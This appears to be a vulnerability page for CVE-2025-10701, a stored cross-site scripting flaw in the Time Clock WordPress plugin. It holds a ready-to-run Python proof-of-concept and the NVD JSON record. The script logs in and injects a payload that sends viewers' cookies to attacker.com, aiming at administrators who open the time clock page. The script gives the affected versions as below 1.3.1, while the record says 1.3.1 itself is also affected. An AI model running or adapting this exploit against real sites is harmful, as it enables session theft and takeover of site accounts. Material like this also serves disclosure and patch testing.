CVE-2025-10701

import requests import sys # CVE-2025-10701 PoC - Stored XSS in Time Clock WordPress Plugin # Target: WordPress site with Time Clock plugin < 1.3.1 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "time_clock_user" PASSWORD = "user_password" def exploit_stored_xss(): """ This PoC demonstrates the stored XSS vulnerability in the 'data' parameter. The injected script will be stored and executed when other users view the page. """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Inject malicious XSS payload via 'data' parameter # Payload: <script>alert(document.cookie)</script> xss_payload = '<script>document.location="http://attacker.com/steal?c="+document.cookie</script>' time_clock_url = f"{TARGET_URL}/wp-admin/admin.php?page=time-clock" clock_data = { 'action': 'clock_in', # or clock_out depending on context 'data': xss_payload, # Vulnerable parameter 'submit': 'Clock In' } inject_response = session.post(time_clock_url, data=clock_data) if inject_response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload: {xss_payload}") print("[+] Script will execute when admin views the time clock page") return True else: print("[-] Injection failed") return False if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-10701", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:41.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Time Clock – A WordPress Employee & Volunteer Time Clock Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameter in all versions up to, and including, 1.3.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with Time Clock user credentials to inject arbitrary web scripts in pages that will execute whenever a user accesses an affected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/time-clock/tags/1.3/includes/actions.php#L387", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/time-clock/tags/1.3/includes/admin/activity.php#L149", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3382912%40time-clock&new=3382912%40time-clock&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3710f219-545f-421d-a654-f49169ff7808?source=cve", "source": "[email protected]"}]}}